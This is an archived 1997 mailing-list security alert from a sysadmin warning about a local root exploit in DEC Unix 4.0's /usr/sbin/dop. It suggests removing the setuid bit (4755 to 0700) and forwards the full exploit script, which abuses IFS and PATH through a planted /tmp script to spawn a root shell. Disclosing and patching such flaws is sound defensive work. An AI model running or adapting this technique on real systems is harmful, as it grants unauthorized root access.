This is a security alert for anyone who has not heard about this crack.
This crack initiated by any user will give him full root priveledges. You
can prevent this crack by changing permissions on /usr/sbin/dop from 4755
to 0700. This should fix the problem. Please let me know if changing
these permissions will cause any problems I am unaware of. Thanks.
Cliff
*************************************************************************
*Cliff Friedel * *
*cfriedel_at_penn.com * *
*jchan_at_elektra.warbeast.com * *
***************************************** *
*For Technical Questions * *
*please contact: * *
***************************************** *
*sysadmin_at_penn.com * *
*************************************************************************
---------- Forwarded message ----------
#DEC Unix 4.0, 4.0A and 4.0B /usr/sbin/dop exploit
#!/bin/sh
cat > /tmp/usr <<EOF
#!/bin/sh
IFS=" "
export IFS
exec /bin/sh
EOF
chmod 755 /tmp/usr
IFS=/ PATH=/tmp:$PATH /usr/sbin/dop crack-user=root
Received on Mon Jun 02 1997 - 07:56:51 NZST